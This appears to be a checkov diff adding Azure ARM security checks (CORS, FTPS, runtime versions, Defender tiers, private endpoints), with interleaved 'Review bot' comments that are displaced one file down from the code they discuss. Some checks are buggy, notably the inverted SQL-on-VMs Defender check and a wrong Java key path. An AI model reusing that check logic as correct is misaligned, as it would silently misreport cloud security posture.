+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+            missing_block_result=CheckResult.PASSED
+        )
+
+    def get_inspected_key(self) -> str:
+        return 'properties/siteConfig/cors/allowedOrigins'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return ['*']
+
+
+check = AppServiceDisallowCORS()
diff --git a/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py b/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py
index 7cce9eae3f5..415d32c6ac9 100644
--- a/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py
+++ b/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py
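Review bot: `self.evaluated_keys = properties.get("managedRules")` stores the managedRules dict (or None) in a field that holds a list of key paths, and that value survives whenever the loop body never runs (managedRules present but managedRuleSets empty), so the finding points at a dict instead of a path; `self.evaluated_keys = ["managedRules"]` is the value intended there. In the innermost loop `disabled_rule.get("ruleId")` has no `isinstance(disabled_rule, dict)` guard, although rule_override two levels up has one, so a malformed entry raises AttributeError instead of being skipped.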
@@ -14,7 +14,7 @@ def get_inspected_key(self) -> str: return "properties/netFrameworkVersion" def get_expected_value(self) -> str: - return "v7.0" + return "v8.0" check = AppServiceDotnetFrameworkVersion()
diff --git a/checkov/arm/checks/resource/AppServiceFTPSState.py b/checkov/arm/checks/resource/AppServiceFTPSState.py
new file mode 100644
index 00000000000..5c20ed0bab0
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceFTPSState.py
@@ -0,0 +1,25 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from typing import List
+from typing import Any
+
+
+class AppServiceFTPSState(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure FTP deployments are disabled"
+        id = "CKV_AZURE_78"
+        supported_resources = ('Microsoft.Web/sites',)
+        categories = (CheckCategories.APPLICATION_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/ftpsState"
+
+    def get_expected_value(self) -> Any:
+        return "Disabled"
+
+    def get_expected_values(self) -> List[Any]:
+        return ["Disabled", "FtpsOnly"]
+
+
+check = AppServiceFTPSState()
diff --git a/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py b/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py
new file mode 100644
index 00000000000..ce0540ad8f7
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py
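Review bot: AppServiceFTPSState overrides both `get_expected_value` (returning `"Disabled"`) and `get_expected_values` (returning `["Disabled", "FtpsOnly"]`); if the base class derives the plural from the singular, as the other value checks in this commit rely on, the singular override is dead code and misleads a reader into thinking only `Disabled` is accepted. Keep one of the two, and add a one-line comment such as `# FtpsOnly is accepted: plain FTP is still rejected, which is what the check name asks for` so the accepted-values list does not look like a contradiction of the name.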
@@ -0,0 +1,22 @@
+from typing import Any
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServiceIdentityProviderEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Managed identity provider is enabled for web apps"
+        id = "CKV_AZURE_71"
+        supported_resources = ('Microsoft.Web/sites',)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "identity/type"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = AppServiceIdentityProviderEnabled()
diff --git a/checkov/arm/checks/resource/AppServiceInstanceMinimum.py b/checkov/arm/checks/resource/AppServiceInstanceMinimum.py
new file mode 100644
index 00000000000..5954c70fc95
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceInstanceMinimum.py
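Review bot: `identity/type` with `ANY_VALUE` passes a site whose identity block is `{"type": "None"}`, which is a valid ARM value that explicitly disables managed identity, so the check cannot tell enabled from disabled. Either enumerate the accepted values via `get_expected_values` (`SystemAssigned`, `UserAssigned`, `SystemAssigned, UserAssigned`), or model it as a negative-value check that forbids `"None"`, as the AppServiceDisallowCORS hunk does for `*`.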
@@ -0,0 +1,34 @@
+from __future__ import annotations
+
+from typing import Dict
+
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class AppServiceInstanceMinimum(BaseResourceCheck):
+    def __init__(self) -> None:
+        # "App Services Plans provides a configurable number of instances that will run apps.
+        # When a single instance is configured your app may be temporarily unavailable during unplanned interruptions.
+        # In most circumstances, Azure will self-heal faulty app service instances automatically.
+        # How-ever during this time there may interruptions to your workload."
+        name = "Ensure App Service has a minimum number of instances for failover"
+        id = "CKV_AZURE_212"
+        supported_resources = ("Microsoft.Web/sites", "Microsoft.Web/sites/slots")
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Dict[str, Dict[str, int]]]) -> CheckResult:
+        if "properties" in conf:
+            if conf.get("properties", {}).get("siteConfig") is not None:
+                if "numberOfWorkers" in conf["properties"]["siteConfig"]:
+                    worker_count = conf["properties"]["siteConfig"]["numberOfWorkers"]
+                    if worker_count:
+                        if not isinstance(worker_count, int):
+                            return CheckResult.UNKNOWN
+                        if worker_count > 1:
+                            return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = AppServiceInstanceMinimum()
diff --git a/checkov/arm/checks/resource/AppServiceJavaVersion.py b/checkov/arm/checks/resource/AppServiceJavaVersion.py
new file mode 100644
index 00000000000..759c6fa197b
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceJavaVersion.py
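Review bot: The four nested `if`s in scan_resource_conf collapse to one lookup, `worker_count = ((conf.get("properties") or {}).get("siteConfig") or {}).get("numberOfWorkers")`, which keeps the None handling and makes the FAILED fall-through visible instead of burying it four levels deep. `isinstance(worker_count, int)` also accepts `True`/`False`, which then go through the `> 1` comparison; if booleans should be UNKNOWN like other non-integer values, extend the test with `or isinstance(worker_count, bool)`. The `Dict[str, Dict[str, Dict[str, int]]]` annotation on conf does not describe an ARM resource and differs from the `Dict[str, Any]` the other checks in this commit declare.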
@@ -0,0 +1,22 @@
+from typing import Any
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServiceJavaVersion(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that 'Java version' is the latest, if used to run the web app"
+        id = "CKV_AZURE_83"
+        supported_resources = ('Microsoft.Web/sites',)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.UNKNOWN)
+
+    def get_inspected_key(self) -> str:
+        return "siteConfig/javaVersion"
+
+    def get_expected_value(self) -> Any:
+        return '17'
+
+
+check = AppServiceJavaVersion()
diff --git a/checkov/arm/checks/resource/AppServicePHPVersion.py b/checkov/arm/checks/resource/AppServicePHPVersion.py
new file mode 100644
index 00000000000..196f5463cb9
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServicePHPVersion.py
@@ -0,0 +1,22 @@
+from typing import Any, List
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServicePHPVersion(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that 'PHP version' is the latest, if used to run the web app"
+        id = "CKV_AZURE_81"
+        supported_resources = ["Microsoft.Web/sites"]
+        categories = [CheckCategories.GENERAL_SECURITY]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.UNKNOWN)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/phpVersion"
+
+    def get_expected_values(self) -> List[Any]:
+        return ["8.1", "8.2"]
+
+
+check = AppServicePHPVersion()
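Review bot: `get_inspected_key` returns `"siteConfig/javaVersion"` without the `properties/` prefix that every other site check in this commit uses (compare `"properties/siteConfig/phpVersion"` in the AppServicePHPVersion hunk), so the key is never found in an ARM resource and, with `missing_block_result=CheckResult.UNKNOWN`, CKV_AZURE_83 never produces a PASSED or FAILED result. Change it to `return "properties/siteConfig/javaVersion"`. An exact `'17'` match also rejects any value that carries a patch level; if such values occur in templates, a `get_expected_values` list like the PHP check's is the safer shape.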
diff --git a/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py b/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py
new file mode 100644
index 00000000000..3fabdeb2f78
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py
@@ -0,0 +1,28 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServicePlanZoneRedundant(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        """
+        To enhance the resiliency and reliability of business-critical workloads,
+        it's recommended to deploy new App Service Plans with zone-redundancy.
+
+        There's no additional cost associated with enabling availability zones.
+        Pricing for a zone redundant App Service is the same as a single zone App Service.
+        """
+        name = "Ensure the App Service Plan is zone redundant"
+        id = "CKV_AZURE_225"
+        supported_resources = ["Microsoft.Web/serverfarms", ]
+        categories = [CheckCategories.BACKUP_AND_RECOVERY, ]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.FAILED)
+
+    def get_inspected_key(self) -> str:
+        return "properties/zoneRedundant"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = AppServicePlanZoneRedundant()
diff --git a/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py b/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py
new file mode 100644
index 00000000000..d6b9a1e5751
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py
@@ -0,0 +1,26 @@
+from typing import Any
+
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class AppServicePublicAccessDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Web App public network access is disabled"
+        id = "CKV_AZURE_222"
+        supported_resources = [
+            "Microsoft.Web/sites",
+            "Microsoft.Web/sites/slots",
+            "Microsoft.Web/sites/config"
+        ]
+        categories = [CheckCategories.NETWORKING,]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/publicNetworkAccess"
+
+    def get_expected_value(self) -> Any:
+        return "Disabled"
+
+
+check = AppServicePublicAccessDisabled()
diff --git a/checkov/arm/checks/resource/AppServicePythonVersion.py b/checkov/arm/checks/resource/AppServicePythonVersion.py
new file mode 100644
index 00000000000..33d62206b09
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServicePythonVersion.py
@@ -0,0 +1,28 @@
+from typing import List, Any
+
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class AppServicePythonVersion(BaseResourceValueCheck):
+
+    def __init__(self) -> None:
+        name = "Ensure that 'Python version' is the latest, if used to run the web app"
+        id = "CKV_AZURE_82"
+        supported_resources = ("Microsoft.Web/sites",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+            missing_block_result=CheckResult.UNKNOWN)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/pythonVersion"
+
+    def get_expected_values(self) -> List[Any]:
+        return ["3.9", "3.10", "3.11", "3.12"]
+
+
+check = AppServicePythonVersion()
diff --git a/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py b/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py
new file mode 100644
index 00000000000..43347201879
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py
@@ -0,0 +1,21 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServiceRemoteDebuggingNotEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that remote debugging is not enabled for app services"
+        id = "CKV_AZURE_72"
+        supported_resources = ["Microsoft.Web/sites",]
+        categories = [CheckCategories.GENERAL_SECURITY,]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.PASSED,)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/remoteDebuggingEnabled"
+
+    def get_expected_value(self) -> bool:
+        return False
+
+
+check = AppServiceRemoteDebuggingNotEnabled()
diff --git a/checkov/arm/checks/resource/AppServiceSetHealthCheck.py b/checkov/arm/checks/resource/AppServiceSetHealthCheck.py
new file mode 100644
index 00000000000..a1364bc9115
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceSetHealthCheck.py
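Review bot: CKV_AZURE_72 here and CKV_AZURE_155 in the AppServiceSlotDebugDisabled hunk inspect the same key, `properties/siteConfig/remoteDebuggingEnabled`, expect the same `False`, use the same `missing_block_result=CheckResult.PASSED`, and both list `Microsoft.Web/sites` in supported_resources, so a site with remote debugging enabled is reported twice under two IDs. If 155 is meant for slots only, drop `'Microsoft.Web/sites'` from its supported_resources; otherwise add a comment on one of the two explaining why both apply to sites.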
@@ -0,0 +1,27 @@
+from typing import Any
+
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class AppServiceSetHealthCheck(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        # "Azure App Service monitors a specific path for each web app instance to determine health status.
+        # The monitored path should implement functional checks to determine if the app is performing correctly.
+        # The checks should include dependencies including those that may not be regularly called.
+        # Regular checks of the monitored path allow Azure App Service to route traffic based on availability."
+        name = "Ensure that App Service configures health check"
+        id = "CKV_AZURE_213"
+        supported_resources = ('Microsoft.Web/sites', 'Microsoft.Web/sites/slots',)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'properties/siteConfig/healthCheckPath'
+
+    def get_expected_values(self) -> Any:
+        return ANY_VALUE
+
+
+check = AppServiceSetHealthCheck()
diff --git a/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py b/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py
new file mode 100644
index 00000000000..4b318744acd
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py
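Review bot: `get_expected_values` is the plural hook, which elsewhere in this commit returns a list, but here it returns the `ANY_VALUE` sentinel itself; the sibling checks that accept any value (AppServiceIdentityProviderEnabled, AzureBatchAccountUsesKeyVaultEncryption) override `get_expected_value` instead. Whether returning the sentinel from the plural hook is handled depends on how the base class tests membership, which is not visible here; `def get_expected_value(self) -> Any: return ANY_VALUE` follows the established pattern and removes the doubt.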
@@ -0,0 +1,21 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class AppServiceSlotDebugDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure debugging is disabled for the App service slot"
+        id = "CKV_AZURE_155"
+        supported_resources = ('Microsoft.Web/sites/slots', 'Microsoft.Web/sites',)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.PASSED)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/remoteDebuggingEnabled"
+
+    def get_expected_value(self) -> bool:
+        return False
+
+
+check = AppServiceSlotDebugDisabled()
diff --git a/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py b/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py
new file mode 100644
index 00000000000..1742d9db001
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py
@@ -0,0 +1,17 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class AppServiceSlotHTTPSOnly(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot"
+        id = "CKV_AZURE_153"
+        supported_resources = ("Microsoft.Web/sites", "Microsoft.Web/sites/slots",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/httpsOnly"
+
+
+check = AppServiceSlotHTTPSOnly()
diff --git a/checkov/arm/checks/resource/AutomationEncrypted.py b/checkov/arm/checks/resource/AutomationEncrypted.py
new file mode 100644
index 00000000000..fab47e55e58
--- /dev/null
+++ b/checkov/arm/checks/resource/AutomationEncrypted.py
@@ -0,0 +1,20 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class AutomationEncrypted(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Automation account variables are encrypted"
+        id = "CKV_AZURE_73"
+        supported_resources = ("Microsoft.Automation/automationAccounts/variables",)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/isEncrypted"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = AutomationEncrypted()
diff --git a/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py b/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py
new file mode 100644
index 00000000000..c29e9797da5
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py
@@ -0,0 +1,22 @@
+from checkov.common.models.consts import ANY_VALUE
+from typing import Any
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AzureBatchAccountUsesKeyVaultEncryption(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Batch account uses key vault to encrypt data"
+        id = "CKV_AZURE_76"
+        supported_resources = ("Microsoft.Batch/batchAccounts",)
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def get_inspected_key(self) -> str:
+        return "properties/keyVaultReference"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = AzureBatchAccountUsesKeyVaultEncryption()
diff --git a/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py b/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py
new file mode 100644
index 00000000000..916020a0f07
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py
@@ -0,0 +1,21 @@
+from typing import Any
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AzureDataExplorerDoubleEncryptionEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name: str = "Ensure that Azure Data Explorer uses double encryption"
+        id: str = "CKV_AZURE_75"
+        supported_resources = ("Microsoft.Kusto/clusters",)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/enableDoubleEncryption"
+
+    def get_expected_value(self) -> Any:
+        return True
+
+
+check: Any = AzureDataExplorerDoubleEncryptionEnabled()
diff --git a/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py b/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py
new file mode 100644
index 00000000000..0414f225cd4
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py
@@ -0,0 +1,31 @@
+from __future__ import annotations
+
+from typing import Any, Dict
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureDefenderOnKeyVaults(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Defender is set to On for Key Vault"
+        id = "CKV_AZURE_87"
+        supported_resources = ("Microsoft.Security/pricings",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get('properties', {})
+        pricing_tier = properties.get('pricingTier')
+        name = conf.get('name', '')
+        return (
+            CheckResult.PASSED
+            if pricing_tier == "Standard" and name == 'KeyVaults'
+            else CheckResult.FAILED
+        )
+
+    def get_evaluated_keys(self) -> list[str]:
+        return ["properties.pricingTier", "name"]
+
+
+check = AzureDefenderOnKeyVaults()
diff --git a/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py b/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py
new file mode 100644
index 00000000000..3bb5509a676
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py
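Review bot: scan_resource_conf returns FAILED for every `Microsoft.Security/pricings` resource whose name is not `KeyVaults`, so a template that sets Standard pricing for another plan (say VirtualMachines) gets a CKV_AZURE_87 finding it cannot fix; the AzureDefenderOnKubernetes hunk passes resources of other names, and this check should do the same, e.g. `if name != 'KeyVaults': return CheckResult.PASSED` before the tier comparison. `get_evaluated_keys` also uses dot notation (`"properties.pricingTier"`) where the other checks in this commit use slashes (`"properties/pricingTier"`).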
@@ -0,0 +1,26 @@
+from __future__ import annotations
+from typing import Any
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureDefenderOnKubernetes(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Defender is set to On for Kubernetes"
+        id = "CKV_AZURE_85"
+        supported_resources = ("Microsoft.Security/pricings",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        return (
+            CheckResult.PASSED
+            if conf.get("name") != "KubernetesService" or str(conf["properties"]["pricingTier"]).lower() == "standard"
+            else CheckResult.FAILED
+        )
+
+    def get_evaluated_keys(self) -> list[str]:
+        return ["name", "pricingTier"]
+
+
+check = AzureDefenderOnKubernetes()
diff --git a/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py b/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py
new file mode 100644
index 00000000000..3471e8510d2
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py
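Review bot: `conf["properties"]["pricingTier"]` raises KeyError when a `KubernetesService` pricing resource omits `properties` or `pricingTier`, whereas the neighbouring Defender checks use `conf.get("properties", {})` and return FAILED for the missing value; `str((conf.get("properties") or {}).get("pricingTier")).lower() == "standard"` keeps the case-insensitive comparison and the FAILED fallback. `get_evaluated_keys` returns `"pricingTier"` without the `properties/` prefix the AzureDefenderOnStorage hunk uses for the same field.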
@@ -0,0 +1,31 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+from typing import List, Dict, Any
+
+
+class AzureDefenderOnSqlServersVMS(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Defender is set to On for SQL servers on machines"
+        id = "CKV_AZURE_79"
+        supported_resources = ("Microsoft.Security/pricings",)
+        categories = [CheckCategories.GENERAL_SECURITY]
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+        )
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties", {})
+        name = conf.get("name", "")
+        tier = properties.get("tier")
+        if tier == "Standard" and name == "SqlServerVirtualMachines":
+            return CheckResult.FAILED
+        return CheckResult.PASSED
+
+    def get_evaluated_keys(self) -> List[str]:
+        return ["tier"]
+
+
+check = AzureDefenderOnSqlServersVMS()
diff --git a/checkov/arm/checks/resource/AzureDefenderOnStorage.py b/checkov/arm/checks/resource/AzureDefenderOnStorage.py
new file mode 100644
index 00000000000..ebc2f4ba81a
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDefenderOnStorage.py
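Review bot: The verdict in scan_resource_conf is inverted — a `SqlServerVirtualMachines` pricing at the Standard tier returns FAILED and every other combination, including the Free tier, returns PASSED — and it reads `properties.get("tier")` although the property every other Defender check in this commit reads is `pricingTier`. Replace the two branches with `if name == "SqlServerVirtualMachines" and properties.get("pricingTier") != "Standard": return CheckResult.FAILED` followed by `return CheckResult.PASSED`, and make `get_evaluated_keys` return `["properties/pricingTier", "name"]`. A test with a Standard-tier `SqlServerVirtualMachines` resource expecting PASSED would have caught both.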
@@ -0,0 +1,27 @@
+from typing import Any, Dict, List
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureDefenderOnStorage(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Defender is set to On for Storage"
+        id = "CKV_AZURE_84"
+        supported_resources = ("Microsoft.Security/pricings",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties: Dict[str, Any] = conf.get("properties", {})
+        pricingTier = properties.get("pricingTier", "")
+        return (
+            CheckResult.PASSED
+            if pricingTier == "Standard"
+            else CheckResult.FAILED
+        )
+
+    def get_evaluated_keys(self) -> List[str]:
+        return ["properties/pricingTier"]
+
+
+check = AzureDefenderOnStorage()
diff --git a/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py b/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py
new file mode 100644
index 00000000000..3d212a3b09c
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py
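Review bot: scan_resource_conf never reads `name`, so any `Microsoft.Security/pricings` resource at a non-Standard tier — for example one named `VirtualMachines` — fails CKV_AZURE_84, and a Standard-tier resource of any name passes it; the AzureDefenderOnKubernetes hunk gates on the resource name, and this check needs the equivalent, `if conf.get("name") != "StorageAccounts": return CheckResult.PASSED`. Add `"name"` to `get_evaluated_keys` once it is consulted.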
@@ -0,0 +1,33 @@
+from typing import Dict, Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.util.consts import START_LINE, END_LINE
+
+
+class AzureMLWorkspacePrivateEndpoint(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Azure Machine learning workspace is configured with private endpoint"
+        id = "CKV_AZURE_243"
+        supported_resources = ["Microsoft.MachineLearningServices/workspaces"]
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties")
+        if isinstance(properties, dict):
+            managed_network = properties.get("managedNetwork")
+            if isinstance(managed_network, dict):
+                ob_rules = managed_network.get("outboundRules")
+                if isinstance(ob_rules, dict):
+                    # check no outbound rule has private endpoint type
+                    for key, rule in ob_rules.items():
+                        if key in [START_LINE, END_LINE]:
+                            # Skip inner fields we add
+                            continue
+                        if rule.get("type") == "PrivateEndpoint":
+                            return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = AzureMLWorkspacePrivateEndpoint()
diff --git a/checkov/arm/checks/resource/AzureSearchSLAIndex.py b/checkov/arm/checks/resource/AzureSearchSLAIndex.py
new file mode 100644
index 00000000000..c13eda686f4
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureSearchSLAIndex.py
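Review bot: The comment `# check no outbound rule has private endpoint type` states the opposite of the loop beneath it, which returns PASSED as soon as one rule has `type == "PrivateEndpoint"`; replace it with `# PASSED if at least one outbound rule is of type PrivateEndpoint`. `rule.get("type")` is called without checking that the value is a dict, so an outboundRules entry that is a string or list raises AttributeError rather than being skipped; `if isinstance(rule, dict) and rule.get("type") == "PrivateEndpoint":` keeps the rest of the loop as it is.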
@@ -0,0 +1,38 @@
+from __future__ import annotations
+
+from typing import Any, Dict
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureSearchSLAIndex(BaseResourceCheck):
+    def __init__(self) -> None:
+        # Cognitive Search services support indexing and querying. Indexing is the process of loading content into
+        # the service to make it searchable. Querying is the process where a client searches for content
+        # by sending queries to the index.
+        # Cognitive Search supports a configurable number of replicas. Having multiple replicas allows queries and
+        # index updates to load balance across multiple replicas.
+        #
+        # To receive a Service Level Agreement (SLA) for Search index updates a minimum of 3 replicas is required.
+        name = "Ensure that Azure Cognitive Search maintains SLA for index updates"
+        id = "CKV_AZURE_208"
+        supported_resources = ["Microsoft.Search/searchServices", ]
+        categories = [CheckCategories.GENERAL_SECURITY, ]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties", {})
+        if not isinstance(properties, dict):
+            return CheckResult.FAILED
+        replica_count = properties.get("replicaCount")
+        if replica_count and isinstance(replica_count, int):
+            if replica_count >= 3:
+                return CheckResult.PASSED
